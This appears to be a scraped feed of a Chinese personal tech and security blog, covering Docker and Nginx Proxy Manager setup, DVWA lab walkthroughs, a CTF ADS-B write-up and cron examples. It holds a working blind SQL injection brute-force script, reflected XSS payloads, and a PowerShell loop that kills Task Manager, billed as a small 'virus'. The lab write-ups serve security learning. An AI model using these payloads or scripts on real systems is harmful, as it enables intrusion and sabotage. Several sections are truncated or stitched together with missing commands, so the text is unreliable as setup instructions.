在该目录下创建一个名为 docker-compose.yml 的文件，并添加以下内容：

'3'
services:
  app:
    image: jc21/nginx-proxy-manager:latest
    restart: always
    ports:
      - "80:80"
      - "81:81"
      - "443:443"
    environment:
      - DB_MYSQL_HOST=db
      - DB_MYSQL_PORT=3306
      - DB_MYSQL_USER=npm
      - DB_MYSQL_PASSWORD=npm
      - DB_MYSQL_NAME=npm
    volumes:
      - ./data:/data
      - ./letsencrypt:/etc/letsencrypt
  db:
    image: yobasystems/alpine-mariadb:latest
    restart: always
    environment:
      - MYSQL_ROOT_PASSWORD=npm
      - MYSQL_DATABASE=npm
      - MYSQL_USER=npm
      - MYSQL_PASSWORD=npm
    volumes:
      - ./data/mysql:/var/lib/mysql

启动 Nginx Proxy Manager

在包含 docker-compose.yml 文件的目录中，运行以下命令启动 Nginx Proxy Manager 和数据库容器：

"Add Proxy Host"。确保以下设置正确：

域名：在 "Domain Names" 区域中输入你要使用的域名。
协议：在 "Scheme" 区域选择 "https"。
转发主机名和端口：在 "Forward Hostname / IP" 区域中输入目标服务器的地址，并在 "Forward Port" 区域中输入端口号，例如：443。
WebSocket 支持：如果目标网站使用了 WebSocket，确保勾选 "Websockets"。
检查 SSL 证书
由于目标网站使用了 HTTPS，你可能需要为反向代理域名配置 SSL 证书。在 Nginx Proxy Manager 的 "Proxy Hosts" 选项卡中，找到刚刚创建的反向代理条目，然后点击右侧的绿色 "Edit" 图标。切换到 "SSL" 选项卡，选择 "Request a new SSL Certificate"，勾选 "Force SSL" 和 "HTTP/2 Support"，然后点击 "Save"。

检查 Nginx 配置

如果问题仍然存在，可以查看 Nginx Proxy Manager 生成的 Nginx 配置文件。在你创建的 "nginx-proxy-manager" 目录中，找到 "data/nginx/proxy_host" 目录。在这个目录下，找到与你的域名相关的配置文件（例如，2.conf），检查其中的反向代理设置是否正确。

重启 Nginx Proxy Manager

在某些情况下，重启 Nginx Proxy Manager 可能有助于解决问题。在包含 docker-compose.yml 文件的目录中，运行以下命令：

$http_upgrade;
proxy_set_header Connection "upgrade";
proxy_set_header Host $host;
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
proxy_set_header X-Forwarded-Proto $scheme;
proxy_set_header X-Forwarded-Host $http_host;
proxy_set_header X-Forwarded-Port $server_port;
proxy_pass $forward_scheme://$server:$port;

保存更改后，需要重启 Nginx Proxy Manager 以使更改生效。

检查网络连接和防火墙设置

确保没有任何网络连接问题或防火墙设置阻止了请求。检查服务器上的防火墙规则，确保允许通过 80、443 和 81 端口的传入连接。同时，确认目标服务器的防火墙设置允许从 Nginx Proxy Manager 发起的连接。

使用ubuntu默认的ufw防火墙来开放端口

sudo ufw allow 80/tcp
sudo ufw allow 81/tcp
sudo ufw allow 443/tcp

Xiaomi-Mall-Home

casearx@foxmail.com (Casear) — Sat, 22 Jun 2024 14:06:44 GMT

https://github.com/CasearF/Xiaomi-Mall-Home
小米商城首页（Someone's practical training assignment）

vscode连接docker查看代码

casearx@foxmail.com (Casear) — Thu, 06 Jun 2024 11:57:49 GMT

安装及配置容器

拉取镜像，这里使用的是OWASP Mutillidae II 靶场

#设置docker自启动
systemctl enable docker
#设置容器自启动
docker update --restart=always <容器id>

进入容器,docker exec -it <容器id> /bin/bash

安装ssh,更新软件包和安装ssh

#修改ssh的配置文件
vim /etc/ssh/sshd_config

在sshd_config修改以下内容

#修改端口为映射的端口
Port 10008
#允许root用户使用ssh登录
PermitRootLogin yes

重启ssh服务

 $\color{red}{ctrl}$  $c t r l$  +  $\color{red}{shift}$   +  $\color{red}{p}$ 



选择自己的配置文件，不知道选哪个就第一个

在文件中添加

Host 
  HostName <服务器IP>
  Port 10008
  User root
  ForwardAgent yes

完成后即可正常使用

使用Hexo生成大量页面时卡死问题解决

casearx@foxmail.com (Casear) — Wed, 29 May 2024 13:05:03 GMT

Hexo 生成网页时文件打开数量限制问题解决方案

最近在尝试使用Hexo做一些简单的网页，如Casear的信息安全周刊。但昨天想起来linux中国归档了全部文章的标准数据集，其中正好有标准的 Markdown 格式的数据，而Hexo正是使用Markdown来生成页面的，就简单尝试了一下。

但在实际生成的时候经常会报 EMFILE: too many open files 和 ERROR Process failed，这意味着你的应用程序已经打开了太多的文件，超出了操作系统允许的数量限制。查阅教程后发现Linux可以临时增加限制，但windows需要修改注册表，感觉windows上的有点麻烦。但实际操作后发现这两种方法都没有什么实质性改变。

在Linux系统中，可以通过以下命令临时增加文件打开的限制：

ulimit -n 4096

在Windows系统中，通常需要修改系统注册表来增加文件打开的限制

但如果使用的是较新的Windows版本（如Windows 10或Windows 11），可以尝试使用 Set-ItemProperty 命令来修改限制：

Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\FileSystem" -Name "LongPathsEnabled" -Value 1

后来查询Hexo的官方文档后发现了 -c 参数，命令：在生成博客的时候，使用参数 -c，代表生成博客时线程的数量。

      
      
      
      加入多线程&多进程

新版本
import concurrent.futures
import requests
from bs4 import BeautifulSoup


def run_code(demot):
    texterr = "User ID is MISSING from the database."
    base_url = "http://192.168.236.20/dvwa/vulnerabilities/sqli_blind/"
    session_id = "8tuabbh2e1oiv0c2flpn3jbvk4"

    params = {"id": demot, "Submit": "Submit"}
    cookies = {"PHPSESSID": session_id, "security": "low"}

    response = requests.get(base_url, params=params, cookies=cookies)
    print(response.status_code)

    soup = BeautifulSoup(response.text, "html.parser")
    search_results = soup.find_all("pre")
    print(search_results)
    print(demot)
    for result in search_results:
        text = result.text.strip()
        print(text)
        if (text != texterr) and ("User ID exists in the database." in text):
            with open("example.txt", "a") as file:
                file.write(demot + "\n")


# 多线程运行
# if __name__ == "__main__":
#     demots = list(range(1, 200))  # 保存所有需要运行的demot
#     max_threads = 10  # 最大线程数
#     with concurrent.futures.ThreadPoolExecutor(max_workers=max_threads) as executor:
#         for i in range(1, 6):
#             for demo in range(1, 128):
#                 demot = f"1' and (select ascii(substr((select table_name from information_schema.tables where table_schema='dvwa' limit 0,1),{i},1)) = {demo}) #"
#                 executor.submit(run_code, demot)


# 多进程
if __name__ == "__main__":
    max_processes = 60
    with concurrent.futures.ProcessPoolExecutor(max_workers=max_processes) as executor:
        for i in range(1, 6):
            for demo in range(1, 128):
                # demot = f"1' and (select ascii(substr((select table_name from information_schema.tables where table_schema='dvwa' limit 0,1),{i},1)) = {demo}) #"
                demot = f"1'and ord(substr(database(),{i},1))= {demo} #"
                executor.submit(run_code, demot)


旧版本
import requests
from bs4 import BeautifulSoup

texterr = "User ID is MISSING from the database."
base_url = "http://192.168.236.20/dvwa/vulnerabilities/sqli_blind/"
session_id = "sb35jegkjt33kjgovvptbua022"

for i in range(1, 5):
    for demo in range(1, 128):
        demot = f"1' and ord(substr(database(), {i}, 1)) = {demo} #"
        params = {"id": demot, "Submit": "Submit"}
        cookies = {"PHPSESSID": session_id, "security": "low"}

        response = requests.get(base_url, params=params, cookies=cookies)

        soup = BeautifulSoup(response.text, "html.parser")
        search_results = soup.find_all("pre")
        for result in search_results:
            text = result.text.strip()
            print(demot)
            if (text != texterr) and ("User ID exists in the database." in text):
                with open("example.txt", "a") as file:
                    file.write(demot + "\n")
                break



导入了requests和BeautifulSoup模块，分别用于发送HTTP请求和解析HTML页面。

定义了一个错误信息变量texterr，以及目标网站的基本URL和会话ID。

使用嵌套循环，遍历数据库名称1-4的ASCII码。

构造Payload字符串demot，然后将其作为参数发送到目标网址。

从响应中解析出页面内容，然后在页面中查找包含响应文本的标签（pre）的内容。

检查每个找到的结果，如果文本不等于错误信息并且包含指定提示，则将查询字符串写入到文件"example.txt"中，并且停止当前循环。

由于在实际测试中测试Payload会返回一个404响应，但其并不影响页面的返回，故没有设置检查响应码

:::info{title="相关信息"}

新版本使用了concurrent.futures.ProcessPoolExecutor(max_workers=max_processes) as executor 创建了一个进程池执行器（ProcessPoolExecutor），设置最大工作进程数为max_processes
来达到加速测试的效果

:::

以下是对python的多线程和多进程的优劣关系和应用场景的解释
多线程（Threading）
优点：

轻量级：线程的创建和销毁比进程快，资源消耗较少。
共享内存：线程间可以共享内存，数据传输简单。
I/O密集型：如果爬虫主要受限于网络I/O，多线程可以有效地利用等待时间来执行其他任务。

缺点：

全局解释器锁（GIL）：Python的CPython实现中的GIL限制了同一时间只能有一个线程执行，这意味着多线程并不能有效利用多核CPU进行并行计算。
资源限制：操作系统对线程的数量有限制，过多的线程可能导致效率降低。

多进程（Multiprocessing）
优点：

绕过GIL：每个进程有自己的Python解释器和内存空间，可以绕过GIL的限制，实现真正的并行执行。
CPU密集型：如果爬虫任务是CPU密集型的，多进程可以更好地利用多核处理器。
稳定性：进程间相互独立，一个进程崩溃不会影响其他进程。

缺点：

资源消耗：进程的创建和销毁比线程慢，消耗的资源更多。
进程间通信（IPC）：进程间需要通过IPC进行通信，这比线程间共享内存复杂。
数据共享：进程间共享数据不如线程间方便，需要使用特定的IPC机制。

选择建议：

I/O密集型任务：如果爬虫主要受限于网络请求和响应时间，多线程可能更合适，因为它可以更有效地利用等待时间。
CPU密集型任务：如果爬虫涉及到大量的数据处理，多进程可能更合适，因为它可以利用多核CPU进行并行处理。
爬虫规模：对于大规模的爬虫，多进程可能更有利于扩展和管理。
开发和维护成本：多线程相对简单，但多进程虽然复杂但更稳定。

burpsuite ca证书安装

casearx@foxmail.com (Casear) — Sat, 04 May 2024 16:35:12 GMT

burpsuite ca证书安装

使用Burp Suite做安全测试时，要抓取HTTPS的包的话，是需要有Burp Suite的CA证书的，否则浏览器不支持。

首先要把Burp Suite的CA证书下载到本地

Burp Suite是自带CA证书的，有两种方法把CA证书下载到本地

通过浏览器访问https://burp，下载证书

先使用FoxyProxy启用代理，让Burp Suite能抓到浏览器的数据包才能访问https://burp

点击 CA Certificate即可下载

第二种方法则是直接从Burp Suite中导出证书

点开代理设置

选择导入/导出ca证书选项

选择导出dra格式的证书

接下来就是选择导出路径和文件名了

接下来就是在浏览器中导入证书了

在浏览器设置中搜索证书

打开证书管理器

选择导入并信任证书即可

导入成功后再抓https的包就不会报错了

powerShell script

casearx@foxmail.com (Casear) — Thu, 02 May 2024 16:18:48 GMT

轮询关闭进程
如果在死循环中不断查找任务管理器进程，发现它在运行就把它关闭，就可以做一个小小
的“病毒”。代码很简单，基本上一下子就能看懂。一开始我没有加 Sleep，然后 CPU 使用
率飚的非常高，加了之后基本上对电脑性能没有影响了。

$process_name = "taskmgr"
while ($true) {
 $processes = Get-Process
 if ($processes.Name -contains $process_name) {
 Get-Process $process_name|Stop-Process
 }
 else {
 Start-Sleep -Milliseconds 500
 }

}

DVWA靶场--JavaScript Attacks (前端攻击)

casearx@foxmail.com (Casear) — Wed, 03 Apr 2024 08:52:09 GMT

JavaScript Attacks (前端攻击)

The attacks in this section are designed to help you learn about how JavaScript is used in the browser and how it can be manipulated. The attacks could be carried out by just analysing network traffic, but that isn't the point and it would also probably be a lot harder.

本章节中的攻击旨在帮助您了解如何在浏览器中使用 JavaScript 以及如何对其进行操作，攻击可以通过分析网络流量来实现，但这不是本章节的重点而且可能要困难得多。

Simply submit the phrase "success" to win the level. Obviously, it isn't quite that easy, each level implements different protection mechanisms, the JavaScript included in the pages has to be analysed and then manipulated to bypass the protections.

只需提交单词 “success” 即可攻击成功，显然这并不是那么容易。每个级别都实现了不同的保护机制，页面中包含的JavaScript必须经过分析，然后才能绕过保护。

Low

源码

<form name="low_js" method="post">
		<input type="hidden" name="token" value="" id="token" />
		<label for="phrase">Phraselabel> 
                <input type="text" name="phrase" value="ChangeMe" id="phrase" />
		<input type="submit" id="send" name="send" value="Submit" />
	form><script>

/*
MD5 code from here
https://github.com/blueimp/JavaScript-MD5
这里是一个md5编码的函数
*/

!function(n){"use strict";function t(n,t){var r=(65535&n)+(65535&t);return(n>>16)+(t>>16)+(r>>16)<<16|65535&r}function r(n,t){return n<>>32-t}function e(n,e,o,u,c,f){return t(r(t(t(e,n),t(u,f)),c),o)}function o(n,t,r,o,u,c,f){return e(t&r|~t&o,n,t,u,c,f)}function u(n,t,r,o,u,c,f){return e(t&o|r&~o,n,t,u,c,f)}function c(n,t,r,o,u,c,f){return e(t^r^o,n,t,u,c,f)}function f(n,t,r,o,u,c,f){return e(r^(t|~o),n,t,u,c,f)}function i(n,r){n[r>>5]|=128<32,n[14+(r+64>>>9<<4)]=r;var e,i,a,d,h,l=1732584193,g=-271733879,v=-1732584194,m=271733878;for(e=0;elength;e+=16)i=l,a=g,d=v,h=m,g=f(g=f(g=f(g=f(g=c(g=c(g=c(g=c(g=u(g=u(g=u(g=u(g=o(g=o(g=o(g=o(g,v=o(v,m=o(m,l=o(l,g,v,m,n[e],7,-680876936),g,v,n[e+1],12,-389564586),l,g,n[e+2],17,606105819),m,l,n[e+3],22,-1044525330),v=o(v,m=o(m,l=o(l,g,v,m,n[e+4],7,-176418897),g,v,n[e+5],12,1200080426),l,g,n[e+6],17,-1473231341),m,l,n[e+7],22,-45705983),v=o(v,m=o(m,l=o(l,g,v,m,n[e+8],7,1770035416),g,v,n[e+9],12,-1958414417),l,g,n[e+10],17,-42063),m,l,n[e+11],22,-1990404162),v=o(v,m=o(m,l=o(l,g,v,m,n[e+12],7,1804603682),g,v,n[e+13],12,-40341101),l,g,n[e+14],17,-1502002290),m,l,n[e+15],22,1236535329),v=u(v,m=u(m,l=u(l,g,v,m,n[e+1],5,-165796510),g,v,n[e+6],9,-1069501632),l,g,n[e+11],14,643717713),m,l,n[e],20,-373897302),v=u(v,m=u(m,l=u(l,g,v,m,n[e+5],5,-701558691),g,v,n[e+10],9,38016083),l,g,n[e+15],14,-660478335),m,l,n[e+4],20,-405537848),v=u(v,m=u(m,l=u(l,g,v,m,n[e+9],5,568446438),g,v,n[e+14],9,-1019803690),l,g,n[e+3],14,-187363961),m,l,n[e+8],20,1163531501),v=u(v,m=u(m,l=u(l,g,v,m,n[e+13],5,-1444681467),g,v,n[e+2],9,-51403784),l,g,n[e+7],14,1735328473),m,l,n[e+12],20,-1926607734),v=c(v,m=c(m,l=c(l,g,v,m,n[e+5],4,-378558),g,v,n[e+8],11,-2022574463),l,g,n[e+11],16,1839030562),m,l,n[e+14],23,-35309556),v=c(v,m=c(m,l=c(l,g,v,m,n[e+1],4,-1530992060),g,v,n[e+4],11,1272893353),l,g,n[e+7],16,-155497632),m,l,n[e+10],23,-1094730640),v=c(v,m=c(m,l=c(l,g,v,m,n[e+13],4,681279174),g,v,n[e],11,-358537222),l,g,n[e+3],16,-722521979),m,l,n[e+6],23,76029189),v=c(v,m=c(m,l=c(l,g,v,m,n[e+9],4,-640364487),g,v,n[e+12],11,-421815835),l,g,n[e+15],16,530742520),m,l,n[e+2],23,-995338651),v=f(v,m=f(m,l=f(l,g,v,m,n[e],6,-198630844),g,v,n[e+7],10,1126891415),l,g,n[e+14],15,-1416354905),m,l,n[e+5],21,-57434055),v=f(v,m=f(m,l=f(l,g,v,m,n[e+12],6,1700485571),g,v,n[e+3],10,-1894986606),l,g,n[e+10],15,-1051523),m,l,n[e+1],21,-2054922799),v=f(v,m=f(m,l=f(l,g,v,m,n[e+8],6,1873313359),g,v,n[e+15],10,-30611744),l,g,n[e+6],15,-1560198380),m,l,n[e+13],21,1309151649),v=f(v,m=f(m,l=f(l,g,v,m,n[e+4],6,-145523070),g,v,n[e+11],10,-1120210379),l,g,n[e+2],15,718787259),m,l,n[e+9],21,-343485551),l=t(l,i),g=t(g,a),v=t(v,d),m=t(m,h);return[l,g,v,m]}function a(n){var t,r="",e=32*n.length;for(t=0;t8)r+=String.fromCharCode(n[t>>5]>>>t%32&255);return r}function d(n){var t,r=[];for(r[(n.length>>2)-1]=void 0,t=0;tlength;t+=1)r[t]=0;var e=8*n.length;for(t=0;t8)r[t>>5]|=(255&n.charCodeAt(t/8))<32;return r}function h(n){return a(i(d(n),8*n.length))}function l(n,t){var r,e,o=d(n),u=[],c=[];for(u[15]=c[15]=void 0,o.length>16&&(o=i(o,8*n.length)),r=0;r<16;r+=1)u[r]=909522486^o[r],c[r]=1549556828^o[r];return e=i(u.concat(d(t)),512+8*t.length),a(i(c.concat(e),640))}function g(n){var t,r,e="";for(r=0;rlength;r+=1)t=n.charCodeAt(r),e+="0123456789abcdef".charAt(t>>>4&15)+"0123456789abcdef".charAt(15&t);return e}function v(n){return unescape(encodeURIComponent(n))}function m(n){return h(v(n))}function p(n){return g(m(n))}function s(n,t){return l(v(n),v(t))}function C(n,t){return g(s(n,t))}function A(n,t,r){return t?r?s(t,n):C(t,n):r?m(n):p(n)}"function"==typeof define&&define.amd?define(function(){return A}):"object"==typeof module&&module.exports?module.exports=A:n.md5=A}(this);


	function rot13(inp) {
		return inp.replace(/[a-zA-Z]/g, function(c) {
			return String.fromCharCode((c <= "Z" ? 90 : 122) >= (c = c.charCodeAt(0) + 13) ? c : c - 26);
		});
	}

	function generate_token() {
		var phrase = document.getElementById("phrase").value;
		document.getElementById("token").value = md5(rot13(phrase));
	}

	generate_token();
script>

漏洞复现

在页面的源代码中发现插入的js脚本，发现是获取了 ID为phrase 的输入框的值，
然后再使用md5进行编码，后赋值给一个IDtoken，来验证token

最后一行中的generate_token();代表着加载完就调用函数，所以这个等级很简单

先在输入框中输入"success",然后再在控制台调用函数重新编码覆盖旧的token即可
使用burpsuite抓包观察一下
```
token=8b479aefbd90795395b3e7089ae0dc09&phrase=success&send=Submit
```
发现两次发送的token都一样，这时候观察源码发现有个将value值编码并赋值的函数
generate_token();
直接在浏览器控制台手动调用函数并传参为要加密的字符

得到token后在burpsuite中修改数据为更新后的token

最后在返回的第77行得到了成功提示

Medium

源码

<form name="low_js" method="post">
		<input type="hidden" name="token" value="" id="token" />
		<label for="phrase">Phraselabel> 
                <input type="text" name="phrase" value="ChangeMe" id="phrase" />
		<input type="submit" id="send" name="send" value="Submit" />
	form><script src="../../vulnerabilities/javascript/source/medium.js">script>

漏洞复现

发现form表单下并没有像 Low 等级中直接写出JavaScript代码，而且引用了一个文件

function do_something(e) {
	for (var t = "", n = e.length - 1; n >= 0; n--) 
        t += e[n];
	return t
}
setTimeout(function() {
	do_elsesomething("XX")
}, 300);

function do_elsesomething(e) {
	document.getElementById("token")
		.value = do_something(e + document.getElementById("phrase")
			.value + "XX")
}

生成 token 的函数被放在单独的js文件中，生成的方式是将 "XX" + phrase 变量的值 + "XX"字符串反转作为 token。

do_something(e + document.getElementById("phrase").value + "XX")

在控制台中将这段加密部分打印出来

再用burpsuite查看传过去的token

解题思路和上一等级一样，调用函数生成新的token，再进行发送即可通关

High

源码

<form name="low_js" method="post">
		<input type="hidden" name="token" value="" id="token" />
		<label for="phrase">Phraselabel> 
                <input type="text" name="phrase" value="ChangeMe" id="phrase" />
		<input type="submit" id="send" name="send" value="Submit" />
	form><script src="../../vulnerabilities/javascript/source/high.js">script>

漏洞复现

继续查看引入的js文件，发现被混淆过，使用还原工具得到源码

function do_something(e) {
    for (var t = "", n = e.length - 1; n >= 0; n--) t += e[n];
    return t
}
function token_part_3(t, y = "ZZ") {
    document.getElementById("token").value = sha256(document.getElementById("token").value + y)
}
function token_part_2(e = "YY") {
    document.getElementById("token").value = sha256(e + document.getElementById("token").value)
}
function token_part_1(a, b) {
    document.getElementById("token").value = do_something(document.getElementById("phrase").value)
}
document.getElementById("phrase").value = "";
setTimeout(function() {
    token_part_2("XX")
}, 300);
document.getElementById("send").addEventListener("click", token_part_3);
token_part_1("ABCD", 44);

由于执行 token_part_2("XX") 有 300 毫秒延时，所以 token_part_1("ABCD", 44) 会被先执行，而 token_part_3() 则是和提交按钮的 click 事件一起执行。

攻击方式#
和前面的思路差不多，依次执行 token_part_1("ABCD", 44) 和 oken_part_2("XX")，最后点击提交执行 token_part_3()。

Impossible

:::tip{title="提示"}
你永远无法相信来自用户的任何信息，也无法阻止用户对其进行干扰，因此不存在不可能达到的水平。
:::

强网杯2023 谍影重重2.0 wp

casearx@foxmail.com (Casear) — Fri, 29 Mar 2024 12:13:30 GMT

强网杯2023 谍影重重2.0 wp

题目描述

小明是某间谍组织的一员，他终日监听着我国某重点军事基地的飞行动态，妄图通过分析参数找到我国飞的最快的飞机。我国费尽千辛万苦抓住了他，并在他的电脑上找到了一段他监听的信息，请分析出这段信息中飞的最快的飞机。
格式为flag{md5(ICAO CODE of the fastest plane)}

附件内所涉及的信息均为公开信息，题目描述也均为虚构，切勿当真

:::tip{title="提示"}
文末有下载地址
:::

使用`tshark - r` 文件名打印流量信息

发现都是tcp协议的流量

然后导出流量

命令：

 [导出的文件名]

:::warning{title="注意"}
我习惯使用root用户来操作，在平时使用时，请尽量使用普通用户来运行
:::

分析导出的流量

这里使用了kimi的国内免费ai来进行提问

得知ADS—B可以传输速度信息

cat一下导出的流量

使用python的pyModeS来解析并筛选

import re  # 导入正则表达式模块，用于匹配和处理字符串
import pyModeS  # 导入pyModeS库，用于解码Mode S信号

speed = []  # 创建一个空列表，用于存储包含"Speed"的行
numbers = []  # 创建一个空列表，用于存储从文本中提取的数字

# 打开tcp.txt文件并读取所有行
with open(r"/root/Desktop/demo.txt", "r") as x:
    lines = x.readlines()  # 读取文件的所有行，并存储在lines列表中

# 创建或清空demo_output.txt文件用于写入解码后的结果
with open(r"/root/Desktop/demo_output.txt", "w", encoding="utf-8") as output_file:
    for i in lines:  # 遍历lines列表中的每一行
        # 检查行的长度是否为47个字符
        if len(i) == 47:
            try:
                # 尝试使用pyModeS库解码特定部分的内容
                # 注意：这里假设pyModeS库有decoder模块和tell方法，实际情况可能不同
                decoded_output = pyModeS.decoder.tell(
                    i[18:]
                )  # 解码从第18个字符开始到最后的内容
                # 将解码后的结果写入demo_output.txt文件
                output_file.write(str(decoded_output) + "\n")
            except Exception as e:
                # 如果解码过程中出现错误，将错误信息写入demo_output.txt文件
                output_file.write("错误译码行:" + str(e) + "\n")

# 再次打开demo_output.txt文件，这次用于读取解码后的结果
with open(
    r"/root/Desktop/demo_output.txt", "r", encoding="utf-8", errors="ignore"
) as file:
    for line_number, line in enumerate(file, 1):  # 遍历文件的每一行，并为每一行编号
        if "Speed" in line:
            # 如果行包含"Speed"，则将该行添加到speed列表中
            speed.append(line.strip())
            # 使用正则表达式找到该行中所有的数字
            found_numbers = re.findall(r"\d+", line)
            # 将找到的数字转换为整数并添加到numbers列表中
            numbers.extend([int(num) for num in found_numbers])
            # 再次将处理后的行添加到speed列表中（这里重复添加，可能是代码逻辑上的错误）

# 检查numbers列表是否非空
if numbers:
    # 找出numbers列表中的最大数，并将其转换为字符串
    max_number = str(max(numbers))

# 将最大数写入到test.txt文件中
with open("/root/Desktop/test.txt", "w", encoding="utf-8") as f:
    # 写入最大数到test.txt文件，并在末尾添加换行符
    f.write(max_number + "\n")

筛选完后得出最大速度为`Speed: 371 knots`

获取flag值

解码后的最快速度的数据块为

                ICAO address: 79a05e 
             Downlink Format: 17 
                    Protocol: Mode-S Extended Squitter (ADS-B) 
                        Type: Airborne velocity 
                       Speed: 371 knots
                       Track: 213.3474959459136 degrees
               Vertical rate: -64 feet/minute
                        Type: Ground speed

再把ICAO address MD5一下就得到了flag，后来发现这个并不对，要把ICAO address先大写再MD5后得到：

flag{4cf6729b9bc05686a79c1620b0b1967b}

数据包下载地址

DVWA靶场--XSS(Reflected)教程

casearx@foxmail.com (Casear) — Wed, 03 Apr 2024 10:05:01 GMT

跨站脚本（英语：Cross-site scripting，通常简称为：XSS）是一种网站应用程序的安全漏洞攻击，是代码注入的一种。它允许恶意用户将代码注入到网页上，其他用户在观看网页时就会受到影响。这类攻击通常包含了HTML以及用户端脚本语言。

反射型XSS攻击需要具备以下条件：

需要向web页面注入恶意代码；
这些恶意代码能够被浏览器成功的执行
用户交互

代码级别解析

low

源码



header ("X-XSS-Protection: 0");

// arrary_key_exists()函数：判断$_GET的值中是否存在“name”键名
//并且$_GET[‘name’]的值是否不为空，满足这些条件，直接输出下面的输出语句

if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
    // Feedback for end user
    echo 'Hello ' . $_GET[ 'name' ] . '
';
}

?>

漏洞复现

服务器只是判断了 name 参数是否为空，如果不为空的话就直接打印出来。服务器并没有对 name 参数做任何的过滤和检查。

（1）直接使用进行尝试

Medium

源码



header ("X-XSS-Protection: 0");

// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
    // Get input
//将输入中的

（3）还可以使用一种"奇淫巧计"

"javascript:alert(1)">is

High

源码



header ("X-XSS-Protection: 0");

// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
        // Get input
        $name = preg_replace( '/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $_GET[ 'name' ] );

        // Feedback for end user
        $html .= "Hello ${name}
";
}

?>

漏洞复现

preg_replace() 函数执行一个正则表达式的搜索和替换，* 代表一个或多个任意字符，i 代表不区分大小写。也就是说 < script > 标签在这里被完全过滤了，但是我们可以通过其他的标签例如 img、body 等标签的事件或者iframe 等标签的 src 注入JS攻击脚本。

alert(1)>
<iframe onload="alert(1)">iframe>

Impossible

源码



if(!array_key_exists ("name", $_GET) || $_GET['name'] == NULL || $_GET['name'] == ''){

 $isempty = true;

} else {

 $html .= '';
 $html .= 'Hello ' . htmlspecialchars($_GET['name']);
 $html .= '
';

}

漏洞复现

根据@Fgaoxing想出的url转义，使用%3cscript%3ealert(1)%3c/script%3e依然无法绕过

最新版本使用了一个替换< >的函数，目前无解

青龙面板定时规则

casearx@foxmail.com (Casear) — Sun, 25 Feb 2024 08:55:38 GMT

20 */12 * * * 每12小时的20分
0 0,1-23/3 * * * 0点 1 点 后每3小时
13 1,6,22 * * * 1:13 6:13 22:13运行
0 20 30 * * 每月30日20点运行
0 20 * * 7 每周日20点
12 8 * * *每天8:12
0 0-23/1 * * * 每小时一次
*/5 * * * * ?    #每隔 5 秒执行一次
0 */1 * * * ?    #每隔 1 分钟执行一次
0 0 2 1 * ? *    #每月 1 日的凌晨 2 点执行一次
0 15 10 ? *    #MON-FRI 周一到周五每天上午 10：15 执行
0 15 10 ? 6L    #2002-2006 2002 年至 2006 年的每个月的最后一个星期五上午 10:15 执行
0 0 23 * * ?    #每天 23 点执行一次
0 0 1 * * ?    #每天凌晨 1 点执行一次
0 0 1 1 * ?     #每月 1 日凌晨 1 点执行一次
0 0 23 L * ?    #每月最后一天 23 点执行一次
0 0 1 ? * L    #每周星期天凌晨 1 点执行一次
0 26,29,33 * * * ?    #在 26 分、29 分、33 分执行一次
0 0 0,13,18,21 * * ?    #每天的 0 点、13 点、18 点、21 点都执行一次
0 0 10,14,16 * * ?    #每天上午 10 点，下午 2 点，4 点执行一次
0 0/30 9-17 * * ?    #朝九晚五工作时间内每半小时执行一次
0 0 12 ? * WED    #每个星期三中午 12 点执行一次
0 0 12 * * ?    #每天中午 12 点触发
0 15 10 ? * *    #每天上午 10:15 触发
0 15 10 * * ?    #每天上午 10:15 触发
0 15 10 * * ? *    #每天上午 10:15 触发
0 15 10 * * ?    #2005 2005 年的每天上午 10:15 触发
0 * 14 * * ?    #每天下午 2 点到 2:59 期间的每 1 分钟触发
0 0/5 14 * * ?    #每天下午 2 点到 2:55 期间的每 5 分钟触发
0 0/5 14,18 * * ?    #每天下午 2 点到 2:55 期间和下午 6 点到 6:55 期间的每 5 分钟触发
0 0-5 14 * * ?    #每天下午 2 点到 2:05 期间的每 1 分钟触发
0 10,44 14 ? 3 WED    #每年三月的星期三的下午 2:10 和 2:44 触发
0 15 10 ? * MON-FRI    #周一至周五的上午 10:15 触发
0 15 10 15 * ?    #每月 15 日上午 10:15 触发
0 15 10 L * ?    #每月最后一日的上午 10:15 触发
0 15 10 ? * 6L    #每月的最后一个星期五上午 10:15 触发
0 15 10 ? * 6L    #2002-2005 2002 年至 2005 年的每月的最后一个星期五上午 10:15 触发
0 15 10 ? * 6#3    #每月的第三个星期五上午 10:15 触发

你一句春不晚，我就到了真江南

casearx@foxmail.com (Casear) — Thu, 02 May 2024 10:21:37 GMT

在Ubuntu上搭建Fivem服务器

casearx@foxmail.com (Casear) — Sun, 19 May 2024 14:14:12 GMT

在实际操作前请确认您有一定的linux操作常识
操作问题评论看到了就会回复

在 Ubuntu 上安装 MariaDB

接下来，会提示是否为 MySQL root 用户设置密码：

Set root password? [Y/n] n

输入n。在 Ubuntu 上， MariaDB 用户默认使用auth_socket进行鉴权。这个插件会检查启动客户端的本地系统用户是否和指定的 MariaDB 用户名相匹配。

下一步，

系统会要求移除匿名用户，

限制 root 用户访问本地机器，

移除测试数据库，

并且重新加载权限表。如下所示，：

Remove anonymous users? [Y/n] Y

Disallow root login remotely? [Y/n] n

Remove test database and access to it? [Y/n] Y

Reload privilege tables now? [Y/n] Y

以 root 身份登录
如果想要在终端命令行和 MariaDB 服务器进行交互，可以使用mysql客户端工具或者mariadb。这个工具被作为MariaDB 服务器软件包的依赖软件被安装。

这个auth_socket插件将会通过 Unix socket 文件验证用户来连接localhost。这就意味着你不能通过提供密码来验证 root。
想要以 root 用户名登录 MariaDB 服务器，需要输入以下命令：

Cata_a的配置txAdmin教程，我这里就犯懒一下

连接linux来修改代码可以使用vscode 的远程连接来访问linux服务器上的文件

本文使用的MobaXterm 简体中文汉化版为github开源版本

青龙面板+wxBotWebhook实现自动推送天气

casearx@foxmail.com (Casear) — Mon, 05 May 2025 13:08:54 GMT

:::warning{title="注意"}
https://github.com/danni-cool/wechatbot-webhook

作者已于 2025 年 1 月 10 日存档。现在为只读
:::

# 导入requests库，用于发送HTTP请求
import requests
import json

# POST请求的URL，这里假设你有一个本地服务器在192.168.1.133的3001端口上运行，用于接收POST请求
webhook_url = 'http://192.168.1.133:3001/webhook/msg'

# 定义一个函数，用于发送GET请求获取天气数据
def get_weather_data(city_code):
